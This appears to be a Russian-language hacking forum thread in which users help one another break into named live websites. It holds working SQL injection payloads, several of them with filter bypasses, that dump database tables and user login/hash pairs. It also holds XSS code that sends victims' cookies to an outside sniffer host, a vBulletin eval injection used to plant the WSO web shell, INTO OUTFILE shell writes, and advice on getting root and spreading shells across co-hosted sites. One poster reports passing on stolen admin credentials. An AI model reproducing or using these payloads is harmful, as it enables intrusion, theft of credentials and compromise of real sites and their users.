id=-983 GROUP BY 2 -- через group выяснил что 2 поля

но когда делаю

id=-983 UNION SELECT 1,2

все равно пишет что Query failed: The used SELECT statements have a different number of columns

sl1k said:
подскажите в чем пробл.
id=-983 GROUP BY 2 -- через group выяснил что 2 поля
но когда делаю
id=-983 UNION SELECT 1,2
все равно пишет что Query failed: The used SELECT statements have a different number of columns



несколько запросов, используйте error based метод

sl1k said:
подскажите в чем пробл.
id=-983 GROUP BY 2 -- через group выяснил что 2 поля
но когда делаю
id=-983 UNION SELECT 1,2
все равно пишет что Query failed: The used SELECT statements have a different number of columns


пробуй UNION ALL SELECT 1,2

Boolean said:
пробуй UNION ALL SELECT 1,2


результат тоже

c error based буду разбираться ибо новичок в sql пока

Такой вопрос

index.php?kat=2&kp=-39+union+select+(pass)+from+user+limit+0,1/*

Таким запросом я могу просматривать хэши, меняя только значения limit,

а каким запросом можно перемаслать Юзверей?

Киев said:
Такой вопрос
index.php?kat=2&kp=-39+union+select+(pass)+from+user+limit+0,1/*
Таким запросом я могу просматривать хэши, меняя только значения limit,
а каким запросом можно перемаслать Юзверей?


Ты имеешь ввиду логины ?

ну например так

index.php?kat=2&kp=-39+union+select+concat_ws(0x2F,login,pass)+from+us er+limit+0,1/*

вывод будет логин/хеш

или так

index.php?kat=2&kp=-39+union+select+concat(login,0x2F,pass)+from+user+ limit+0,1/*

вывод будет такой же

pirat0 said:
http://mastiff-dog.com/index.php?PageT=ReadNews&act=Empty&ID=-87
ребята прошу просто посмотреть есть ли тут инъекцыя??


В других параметрах

_http://mastiff-dog.com/index.php?PageT=ForSale&act=&CatID=-1+union+select+1,2,3,(select(@x)from(select(@x:=0x 00),(select(null)from(information_schema.columns)w here(table_schema!=0x696e666f726d6174696f6e5f73636 8656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table _schema,0x2e,table_name,0x3a,column_name))))x),5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4+--+

пытаюсь создать файл

Powered by vBulletin® Version 3.8.5

file_put_contents('lala.php', '');

allow_url_include=Off

disable_functions=no value

magic_quotes_gpc=On

http://www.site.com/forum/faq.php?cmd=bas64_decode($_GET[a]);&a=ZmlsZV9wdXRfY29udGVudHMoJ2xhbGEucGhwJywgJzw/IGVjaG8gNTAvMjsgPz4nKTs=

выводит

Fatal error: Call to undefined function bas64_decode() in /var/www/site.com/forum/faq.php(329) : eval()'d code(1) : eval()'d code on line 1

что можно еще сделать?

er9j6@

base64_decode

Konqi said:
er9j6@
base64_decode


http://www.site.com/forum/faq.php?cmd=base64_decode($_GET[a]);&a=ZmlsZV9wdXRfY29udGVudHMoJ2xhbGEucGhwJywgJzw/IGVjaG8gNTAvMjsgPz4nKTsNCg==

все равно выводит

404 - Компонент не найден!

2er9j6@,

vbulletin? Тогда смело ставь код пакованного WSO ~25kb. Потом лей как хочешь =)

Ereee said:
2er9j6@
,
vbulletin? Тогда смело ставь код пакованного WSO ~25kb. Потом лей как хочешь =)


а это как, научите?

er9j6@ said:
а это как, научите?


Скачать запакованную версию WSO (https://rdot.org/forum/attachment.php?attachmentid=177&d=1317891888)

Скопируй оттуда код, вставь его туда, где ты вставил код в faq.php. Потом http://forum/faq.php => ??? => PROFIT!

UPD. И да, убери .

А зачем такая конструкция base64_decode($_GET[a])?

Засунь шифровку в base64_decode, гет зачем?

z0mbyak said:
А зачем такая конструкция base64_decode($_GET[a])?
Засунь шифровку в base64_decode, гет зачем?


так тоже не проходит

http://www.site.com/forum/faq.php?cmd=base64_decode(ZmlsZV9wdXRfY29udGVudHMo J2xhbGEucGhwJywgJzw/IGVjaG8gNTAvMjsgPz4nKTsNCg==);

ответ

Parse error: syntax error, unexpected ')' in /var/www/site.com/forum/faq.php(329) : eval()'d code(1) : eval()'d code on line 1

Залил. Спасибо, Ereee

z0mbyak said:
А зачем такая конструкция base64_decode($_GET[a])?
Засунь шифровку в base64_decode, гет зачем?



MQ on

Konqi said:
MQ on


Он уже про другой сайт =)

Ereee said:
Он уже про другой сайт =)


какой еще другой? последний пост с данными тут

/showpost.php?p=3004839&postcount=19408

Konqi said:
какой еще другой? последний пост с данными тут
/showpost.php?p=3004839&postcount=19408


Ну так через админку VB вроде пофиг на MQ.

P.S. Стереть все посты вообщем...

Ereee said:
Ну так через админку вроде пофиг на MQ.


О.о разница в чем? он передает данные через Mетод GET, и mq включено, интерпретатор одобряет админку или как?

никакой разницы

Konqi said:
О.о разница в чем? он передает данные через Mетод GET, и mq включено, интерпретатор одобряет админку или как?


Зачем там мучатся с MQ, если в админке булки можно сразу сохранить другой код, чтоб всего этого не было. А с GET-ом ясно, я не это имел ввиду.

P.S. Я с UK. Сорри фор май Рашн

http://www.studyguide.ru/reading.php?id=215'+UnIOn+SeLEcT+1+--+

можно ли обойти вот такую вот фигнюшку??

pirat0 said:
http://www.studyguide.ru/reading.php?id=215'+UnIOn+SeLEcT+1+--+
можно ли обойти вот такую вот фигнюшку??


проверяются вхождения в строке, врятли обойдешь

pirat0 said:
http://www.studyguide.ru/reading.php?id=215'+UnIOn+SeLEcT+1+--+
можно ли обойти вот такую вот фигнюшку??


Не слушай никого, все выводится

5.0.51a-24+lenny5:a28161_studyguid:a14801@localhost:debian-linux-gnu

pirat0 said:
http://www.studyguide.ru/reading.php?id=215'+UnIOn+SeLEcT+1+--+
можно ли обойти вот такую вот фигнюшку??


http://www.studyguide.ru/library.php

?search=2

&form[name]=-1'+union+select+1,2,version(),4,5,6,7,8,9,0,1,2,3, 4,5--+

&form[word]=


er9j6@ said:
Не слушай никого, все выводится
5.0.51a-24+lenny5:a28161_studyguid:a14801@localhost:debian-linux-gnu


Интересно бы саму скуль увидеть или метод.

Подскажите как можно дальше вывесли какие либо данные


http://www.indexcopernicus.com/info.php?id=6)+union+select+1,2,3,4--+

qaz said:
Подскажите как можно дальше вывесли какие либо данные


Error-based:


Code:
http://www.indexcopernicus.com/info.php?id=6)+and(select+1+from(select+count(*),c oncat((select+concat(table_name,0x00)+from+informa tion_schema.tables+limit+20,1),floor(rand(0)*2))x+ from+information_schema.tables+group+by+x)a)--+f

Result:


Code:
Duplicate entry 'users' for key 1

подскажите альтернативу Charles (http://www.charlesproxy.com/)

tamper data

не не тампер не пропрёт а уже всё тенкс.

Здараствуйте, подскажите пожалуйста.. Нашел

http://vsetke.ru/registration/registration_form.jsp

xss При вставке в поля имя и пароль

">alert(/xss/)

Подскажи как можно вытащить куки ?

http://www.poezia.ru/article.php?sid=65755+union+select+1--


Количество столбцов 1, но почему ошибку все равно выдает ?

bodrich said:
Количество столбцов 1, но почему ошибку все равно выдает ?


попробуй вывод в ошибке, там походу нет вывода столбцов вот так крути

http://www.poezia.ru/article.php?sid=65755+and(select+count(*)+from+inf ormation_schema.tables+group+by(concat(version(),0 x00,floor(rand(0)*2))))--+

bodrich said:
Количество столбцов 1, но почему ошибку все равно выдает ?




Code:
http://www.poezia.ru/article.php?sid=65755+and(select+1+from(select+cou nt(*),concat((select+version()),0x00,floor(rand(0) *2))x+from+information_schema.tables+group+by+x)a)--+f



Code:
Duplicate entry '5.0.27' for key 1



Code:
http://www.poezia.ru/article.php?sid=65755+and(select+1+from(select+cou nt(*),concat((select+concat(table_name,0x3a,column _name,0x00)+from+information_schema.columns+limit+ 0,1),floor(rand(0)*2))x+from+information_schema.ta bles+group+by+x)a)--+f



Code:
Duplicate entry 'CHARACTER_SETS:CHARACTER_SET_NAME' for key 1

pirat0 said:
">javascript:src=http://'sniffer.com?'+document.cookie;"
как-то так вроде помнится))




Code:
img = new Image(); img.src = "http://sniffer?"+document.cookie;
location.href = "http://sniffer?" + document.cookie;

PHP:
">(new Image()).src='http://site.com/sniffer.php?'+document.cookie

Можно отправлять GET-запросом


http://vsetke.ru/registration/registration_form.jsp?email_address=">(new Image()).src='http://site.com/sniffer.php?'%2bdocument.cookie


Вставляешь на свой сайт скрытый фрейм


PHP:
(new Image()).src='http://site.com/sniffer.php?'+document.cookie">

Когда юзер зайдет на сайт, куки отправятся на сниффер. В IE и хроме этот вариант не сработает из-за фильтров.

p.s.:

В этом примере используется GET-запрос, потому что реализация атаки проще. Но если есть возможность, лучше использовать POST-запрос для эксплуатации XSS.

bodrich said:
Количество столбцов 1, но почему ошибку все равно выдает ?


Потому что несколько запросов к базе. В первом один столбец, во втором больше.

что можно сделать в подобном случае?


http://www.bluegrassmidwest.com/details.php?id=2+or+1+group+by+concat%28%28select+ version%28%29%29,floor%28rand%280%29*2%29%29having +min%280%29+or+1--+


ответ

error setting cookie

[CODE]
Code:
POSTDATA =-----------------------------114782935826962
Content-Disposition: form-data; name="f[id]"

-----------------------------114782935826962
Content-Disposition: form-data; name="f[galery_id]"

1565
-----------------------------114782935826962
Content-Disposition: form-data; name="f[order_id]"

-----------------------------114782935826962
Content-Disposition: form-data; name="f[title_ru]"

-----------------------------114782935826962
Content-Disposition: form-data; name="f[title_en]"

-----------------------------114782935826962
Content-Disposition: form-data; name="f[title_ua]"

-----------------------------114782935826962
Content-Disposition: form-data; name="f[img_small]"; filename=""
Content-Type: application/octet-stream

-----------------------------114782935826962
Content-Disposition: form-data; name="f[img_big]"; filename="d00m.php"
Content-Type: unknown/unknown

qaz said:
что можно сделать в подобном случае?
ответ
error setting cookie


http://www.bluegrassmidwest.com/details.php?id=6'and(0)/*--*/order/*--*/by/*--*/10/*)

вот столбцы можно подобрать, но потом как только вставляеш в запрос union все валится, походу какой то фильтр, UNiOn такого типа тоже не канает((, может еще у кого какие идеи будут??

pirat0 said:
http://www.bluegrassmidwest.com/details.php?id=6'and(0)/*--*/order/*--*/by/*--*/10/*)
вот столбцы можно подобрать, но потом как только вставляеш в запрос union все валится, походу какой то фильтр, UNiOn такого типа тоже не канает((, может еще у кого какие идеи будут??


У тебя запятые фильтруется. Вместо пробела юзай /**/, а комментарии /*. Пока такой вид:


Code:
http://www.bluegrassmidwest.com/details.php?id=6'/**/union/**/select/**/*/**/from/**/(select/**/1)x/**/join/**/(select/**/2)y/**/join(select/**/3)z/*



Code:
The used SELECT statements have a different number of columns

Сейчас докрутим

UPD.


Code:
http://www.bluegrassmidwest.com/details.php?id=-6'/**/union/**/select/**/*/**/from/**/(select/**/1)x/**/join/**/(select/**/version())y/**/join(select/**/user())z/**/join(select/**/database())a/**/join(select/**/5)b/**/join(select/**/6)c/**/join(select/**/7)d/**/join(select/**/8)e/**/join(select/**/9)f/**/join(select/**/10)g/**/join(select/**/11)h/*



Code:
5.0.22:web115u1@localhost:web115db1

Удачи

Ereee said:
Удачи


добавил

table_name+from+information_schema.tables


http://www.bluegrassmidwest.com/details.php?id=-6%27/**/union/**/select/**/*/**/from/**/%28select/**/1%29x/**/join/**/%28select/**/table_name+from+information_schema.tables%29y/**/join%28select/**/user%28%29%29z/**/join%28select/**/version%28%29%29a/**/join%28select/**/5%29b/**/join%28select/**/6%29c/**/join%28select/**/7%29d/**/join%28select/**/8%29e/**/join%28select/**/9%29f/**/join%28select/**/10%29g/**/join%28select/**/11%29h/*


и снова таже ошибка

OxoTnik said:
Не пашет заливка шела через sql иньекцию
Делаю запрос
file_priv = Y
в чём дело не могу понять


во первых желатильней код шела в значение хекс преоброзовать, во вторых убедись что кавычки не фильтруются и не слешируются...

qaz said:
и снова таже ошибка




Code:
http://www.bluegrassmidwest.com/details.php?id=-6'/**/union/**/select/**/*/**/from/**/(select/**/1)x/**/join/**/(select/**/version())y/**/join(select/**/table_name/**/from/**/information_schema.tables)z/**/join(select/**/database())a/**/join(select/**/5)b/**/join(select/**/6)c/**/join(select/**/7)d/**/join(select/**/8)e/**/join(select/**/9)f/**/join(select/**/10)g/**/join(select/**/11)h/*



Code:
CHARACTER_SETS

Но мы не сможем юзать /**/limit/**/0,1. Ведь там запятая, которая фильтруется.

Поэтому попробуем group_concat:


Code:
http://www.bluegrassmidwest.com/details.php?id=-6'/**/union/**/select/**/*/**/from/**/(select/**/1)x/**/join/**/(select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/)y/**/join(select/**/5)z/**/join(select/**/4)a/**/join(select/**/5)b/**/join(select/**/6)c/**/join(select/**/7)d/**/join(select/**/8)e/**/join(select/**/9)f/**/join(select/**/10)g/**/join(select/**/11)h/*

Видим members.

Еще один ньюанс. Оказывается, что фильтруется и "=". Т.e. where/**/table_name='members' юзать невозможно. Но зато есть LIKE:


Code:
http://www.bluegrassmidwest.com/details.php?id=-6'/**/union/**/select/**/*/**/from/**/(select/**/1)x/**/join/**/(select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/'members')y/**/join(select/**/5)z/**/join(select/**/4)a/**/join(select/**/5)b/**/join(select/**/6)c/**/join(select/**/7)d/**/join(select/**/8)e/**/join(select/**/9)f/**/join(select/**/10)g/**/join(select/**/11)h/*



Code:
memberID,lname,fname,email

и т.д.

P.S. Можно еще в XSS превратить:


Code:
http://www.bluegrassmidwest.com/details.php?id=-6'/**/union/**/select/**/*/**/from/**/(select/**/1)x/**/join/**/(select/**/%3Cscript%3Ealert('Privet!')%3C/script%3E/**/from/**/members)y/**/join(select/**/5)z/**/join(select/**/4)a/**/join(select/**/5)b/**/join(select/**/6)c/**/join(select/**/7)d/**/join(select/**/8)e/**/join(select/**/9)f/**/join(select/**/10)g/**/join(select/**/11)h/*


2OxoTnik,


Code:
+union+select+1,2,'',4,5,6,7,8+into+outfile+'/var/www/shell.php'--

Папка доступна на запись? При выполнении error не выскакивает? Если да, то ищи другие папки. Проверь MQ.

OxoTnik said:
Не пашет заливка шела через sql иньекцию
Делаю запрос
file_priv = Y
в чём дело не могу понять




Code:
select '' from table_name into outfile '/var/www/shell.php';

или попробуй так:


Code:
select '' from mysql.user into outfile '/var/www/shell.php'

а вот такой вопрос, короче тут слепая скуля,

наугад в пару запросов нашол таблицу users и колонку passwd


http://www.pushkino-online.ru/auto_ads.php?aid=7+and+ascii%28substring%28%28sele ct%20passwd%20from%20users%20limit%200,1%29,1,1%29 %29=100


осталось добыть пароль, и тут возникла проблема,

через пхп скрипт немогу перебрать так как при откритии урала в ответе от сайта только ответ о том что неустановлен какойто плагин, хавидж не может ничего сделать, какие могут быть предложеня?

qaz said:
хавидж не может ничего сделать, какие могут быть предложеня?


Если хавидж не берет, значит раскрутить это нельзя!!! XDDD

Какие тут могут быть предложения... Крути ручками или ищи еще какие-то программы (sqlmap, Toolza, даже не знаю какие еще существуют), иногда бывает проще написать скрипт для дампа самому.

З.Ы: Отправил логин-пароль админа в личку.

Такая проблема, залил шел на сайт, зашёл на шел оказался в /home/gtrxuoxn/public_html/images/, далее перешёл в раздел /home/, а там около 3х тыщ сайтов и не на одном нельзя править править файлы даже не везде можно загрузить файл, что тут можно сделать??

Попытайся получить root-права на этой машине (тебе Сюда (https://antichat.live/threads/296327/))

Выложи туда конфигурацию сервера согласно примеру из 1ого поста и возможно тебе помогут :3

muljtik, найди на сайтах папки с правами на запись и выполнение, залей туда шеллы.

Если крупные сайты, можно поискать баги в скриптах.